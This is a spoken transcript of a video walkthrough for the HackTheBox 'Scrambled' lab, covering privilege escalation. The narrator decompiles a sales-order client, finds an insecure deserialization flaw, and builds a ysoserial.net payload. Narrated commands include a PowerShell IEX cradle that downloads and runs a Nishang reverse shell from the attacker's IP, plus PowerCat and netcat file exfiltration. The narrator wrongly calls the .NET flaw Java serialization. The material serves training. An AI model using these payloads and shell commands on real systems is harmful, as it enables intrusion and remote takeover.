Welcome back, guys. This is part 2 from Scrambled Hackthebox machine, and in this part we are going to escalate our privileges to anti-authority system. We already get the user flag and we already logged in as MISC user, and in this part we are going to root this machine. So without wasting time, I'm going to just enumerate more this user. So as you can see here, we have user flag. Now if I say cd slash and dir, so you can see we have here shares folder. So cd shares ls, and we have few shares, and these shares we cannot access before. We can only access the public folder, and there is another share which we access sysvol. So now let's go and we will see each of these shares. So cd hr ls, so we are not authorized to access this, permission denied. Okay, cd dot slash, let's say it, and hit enter, ls, and there are few directories. Let's say go to the app, so cd apps, hit enter, ls, and there is sales order client. So let's see what's inside this. cd and sales order client, paste that. Make sure you enclose it with double quotes because there are spaces in between. So hit enter, ls again, and there we have two files. The first one is scrambled client.exe and its associate DLL file. So if we go back here, this part of this website, here you can see, if you are experiencing problem with the sales order app, please enable debugging or debug logging and reproduce the problem. You can enable debug logging like this. So here you can see Scrambled Corp login. This is the login page, and here we have sales order client. So I think this is the same application, and as you can see, it can connect to its server on port number 4411. So this is the client application. Server is running on the domain controller dc1.scrm.local. So or you can see this client application is actually authenticating user from the domain controller Active Directory. So that's been said, these are interesting and I want to download these files to my PC. And to do so, the thing is, once I did that machine, netcat and other downloads were not working, so I used PowerCat. So I already have the PowerCat to my PC. Actually, I don't need this now. Exit, clear. So take this here, clear, cd slash opt, cd PowerCat, clear, and if I say ls space -la, so we have PowerCat.ps1. Now we need to upload this file to the target machine, and how we will do that, come back here, and what we need to do is, let's go to cd slash users slash miscsvc, and here we need to invoke web request, and the web request, sorry, we cannot use arrow sign, space -uri, and URL is going to be http://10.10.14.37. This is my PC, and powercat.ps1, and enclose it space hyphen out file, and out file, let's say powercat.ps1. okay, so we just need to clear it, come back here, and here I'm going to start the web server. So python space hyphen m http dot server on port number 80, and just hit enter. Go back here and just click here, enter, and if we have here the request, so we got a hit, and the powercat should be on the machine. So ls, and there is powercat ps1. So now using powercat ps1 we can download these two files to our machine, right? So first of all we need to import this module. So import module powercat.ps1. now the module is imported. Now we can run it as a command, powercat space hyphen c, which is going to be my machine where I want to send the file. So on my machine, space hyphen p for the port. So let's say I'm using port 1234, space hyphen I, from where I want to send the file, which file. So I must mention the full path. So inside C there are shares. Inside shares there are many shares, but we got this in the IT, right? So IT, inside IT there is a directory apps. Inside apps there is another directory which is sales order client. So paste that, and inside sales order client we have first of all scrambled client.exe. paste that, right? Okay, now on my machine here I'm going to say nc space hyphen nlvp, listening on port number 1234, and receiving file which is scrambled client.exe, right? So just hit enter. I'm listening now, hit enter here, and we should have this file now. So if I come here, you can see scrambled client.exe is here. Fine, now it's time to download other file which is scrambled lib.dll file. Okay, hit enter, and here also I'm just going to copy this, paste that, and scramble lib.dll. fine, hit enter, and we should have this file too. So where is it? lib.dll. So we have both of these files on my local PC. So now I'm going to analyze these files. Now Control C, okay, and that's it. So I already transferred these files to my Windows machine. My purpose here to show you how you can download these files if nothing is working. So I tried bunch of ways, but netcat didn't work, other didn't work, so I use this one, powercat. I will mention its GitHub repository link in the description section, and you can clone powercat repository from there. So that's been said, now I'm going to my Windows machine. So let's see, xfree RDP. You can also use this Remina. You can also use Remina, but I love this X-free RDP. So X-free RDP, and you can specify username like this. So my username is test, and you can specify password like this, and the password is 123456 and space /v, which is going to be the IP address of the machine. So 192.168.10.184, this is my machine IP, and the port number is 3389. This is the default port number for Windows Remote Desktop. This is my machine. Now what I need to do here is I already have DNS Spy here and Scrambled. In this folder I put both of these files. So if I run this file, you can see this is the same we got here, right? Okay, now what we can do to analyze it, I'm going to put this file in a disassembler, and I'm using it DNS Spy. So in the DNS Spy, this is my DNS Spy, and many things are there. So to import this file, just click on File tab and open this, and once you open, just click on Scrambled client. So I import it, and let's go import the other file, which is DLL file. So I imported both of these files. Now this is the client, so just open it and open this one, and Scrambled client is there. So if you click on this, you can see there are about window, application, login window, and main window. So these are the window you will get maybe after login, or login window is already there. These are the windows. So login window, we already have it. Maybe after login you will get rest of the windows, right? So if I right click on it, on this main Scrambled client, right click, and I say go to entry point. So once I go to entry point, there is a main function. Fine. Go to application, and inside application there is a main function. This is the main function. So this is the login window. Fine. So there is log on, login complete, edit server link, which is this one. So everything is there. Main window. So if you go to main window here, you will find there are few functions like get order finished, okay, and system window, unlock UI, upload new order, which is this one, and there is this upload new order is calling one function, which is upload order. So if I click on upload order, it takes me to upload order function, which is here. Fine. And this is inside DLL. So DLL net client. So if I click on DLL net client, so you can see I found this upload new order in the Scrambled client here, right? And once I click on this function, where it goes, this one, upload new orders, this one, I click it, it's calling another function, and this function it's calling from the DLL. So once I click on it, I switch to DLL, and inside this DLL there is a Scrambled net client, and inside it we have this function. So if I go to this function, actually you can analyze it more, but I'm going to just point out uh, the key part of this privilege escalation part. So there are other functions too. You can see all other functions there, but the vulnerability exists here. So if we go to this upload feature, it's inside DLL and Scramble lib and then Scramble net client. Inside Scramble net client you will find this function. So once you click this function, here is the code. If you see the code closely, you will find here to upload the new order, there is serialize of this text. So that means there is serialization, and then it's going to order serialize to base 64 this text, what text you will provide. And this serialized vulnerability is the Java serialization, because this code is in Java. So we have to get a tool which can create the payload or generate the payload of Java serialization. And for this I'm going to use a tool which is very good tool for the Java serialization exploit, and this is YSO serialize. So I will also provide the link for this, the GitHub repository. You can clone that repository, but keep in mind, after cloning this repository you have to build that on Visual Studio, Microsoft Visual Studio. So let's go. I already built that. So there is, once you extract this, you will get everything here. You will get this folder also. Once you go inside this folder, you will not get this bin directory. So, and once you build that project, you will get the bin directory. Inside bin you will find debug, and here you will find YSO serial. So I'm going to execute this one. So let's say cmd e cd YSO netmaster. Inside it there is again YSO directory. Inside it there is bin and debug. Fine. Now YSO serial.exe, hit enter, it will show you all the options. So if you see here closely, there are two things. One is format and another one is gadgets. So the gadgets you can see here, these all are gadgets. Okay, but what gadget we are going to use here is Windows gadget. So there are few Windows gadgets like Windows claims identity, Windows identity, and Windows principal. And here we are going to use Windows identity. If you come down, you can see formatter and gadgets. We are going to use these two with space -o for the output, and because we are going to try to execute commands, so we are going to also see space -c, this one. So now plugins, we are not going to use any plugin here. Fine. So the first thing, Windows identity, and inside it the formatter we are going to use is binary formatter. Okay, so let's go. YSO serial.exe space -f. So formatter, the formatter we are going to use here is binary formatter, because this is the gadget and what formats it's supporting, all these formats it's supporting. This Windows claim identity, what formats it's supporting, these all the formats. So because we are using this one, so we will take one of these formatter what we need. So we need binary formatter. Copy that and come here and paste it, right? Next, the gadget name. So the gadget name is Windows identity. It's here. Now paste that, then space -o output is going to be the base 64 space -c, the command which we need to execute. So because here we only have the client, we don't have the server. So if we had this, if we already have the server, we actually run this application server on our machine, and we can test it locally. But because we don't have that, so we cannot test that locally, and so we have to run a command here with which we can confirm that remote command execution working. So let's see, or Java serialization is working. So for this I'm going to actually try pinging my Kali machine. So if we get ICMP hits on our TCP dump, then that means it's working. Or we can also test it by enabling the HTTP server, Python HTTP server on our attack box, and from the server we try to access our Python HTTP server, and if we get hit, that means this serialization is working. So for now I'm going to test it with ping, and because the target machine is Windows, so number of ping we define with the space -n switch, and I'm going to ping 4 times. This is my IP. Fine, just that's it. So hit enter. First of all, it will create the payload, and this is the payload. So we need to copy this payload. Okay, and we need to put this payload with us. But before that, before going to payload, we have one more thing here. So let's try to connect the server to the server. nc space -nv, and it's using port number, it's published on port number 4411, right? And the IP address of the server is this, right? Hit enter. We are connected. Now here, how we actually place the order or upload the order. So for that we still have to find out the commands, because here we don't have anything running. If we say help, nothing. And one more thing we need to point out here, that after every message or every error there is semicolon. So try semicolon, and there is still nothing. So first of all we need to find out exactly the commands. What are the commands? So again, come to the DNS spy, and let's try to find out the commands. So this one is DLL, and in the Scrambled net client we found the function, and in the Scrambled net request, if you go to that net request, you will find here all the commands. So here you can see quit, list order, log on, and upload order. So we need this upload order, right? So now we know the commands. So come here, and first of all I'm going to clear this, and let's say TCP dump space -i tunnel 0. This is the interface, and I am going to listen only ICMP. Hit enter. So if the target server ping us, that means we should get the hits here. Now the command here is upload underscore what order. So order and semicolon, and then we need to paste this payload. So copy that, come here and paste it, hit enter, and as you can see we are getting hits. So we choose ping 4 times. So for each ping one is request, one is response, another request response, request response. So that means total number of packets you can see here are 8. One for each request there is one request and one reply. So this is request packet coming from this server, and the reply packet will go from my machine, means the source address is my machine and the target is that. So the thing is, we are successfully exploited the serialization, Java serialization, and we can execute commands. So if we execute command, we can also get the reverse shell. And to get the reverse shell, similar as before, we are going to upload the Nishank shell string and get the reverse shell. So nc space hyphen nlvp, let's say 4545. Listening on this port. Now go back to Scrambled, and again this is the Nishank shell, and this time I'm just going to change the port, which is 4545. Save this, Control S, come back here, and what we need, horizontal, and here let's start the Python 3 HTTP server space hyphen m http dot server on port number 80. Just hit enter. It's also running now. nc space hyphen nv, and the IP address of the target is 10.10.11.168, and that software or application for sales order is running on 4411. Just hit enter. Okay, now come back here, and we need to create one more payload, and this time let's say instead of this ping, I'm going to say PowerShell IEX new object space net dot web client dot download string. Which string I need to download is http://10.10.14.37. this is my IP, and download ref.ps1. this is Nishank reverse shell, right? That's it. Yeah, hit enter, and this is the payload. So just copy that, come back here, and we are going to say upload underscore order, then semicolon, and just paste the payload, hit enter. We should get hit here, and we get reverse shell. And let's see who we are. So who am I? We are anti-authority system. cd slash users slash administrator ls. So there is download, it should be desktop here, so desktop is also here. Let's go cd desktop ls, and we have the root flag here. So if I say cat root.txt, and this is the root flag. So that's it for this video. Hope you like the content. If you like the content, please like, subscribe and share, and let me know in the comment section if you have any query, and all the links for PowerCat, Nishank shell and rest of the things I will put in the description section. You can get from there. So see you in the next video. Bye.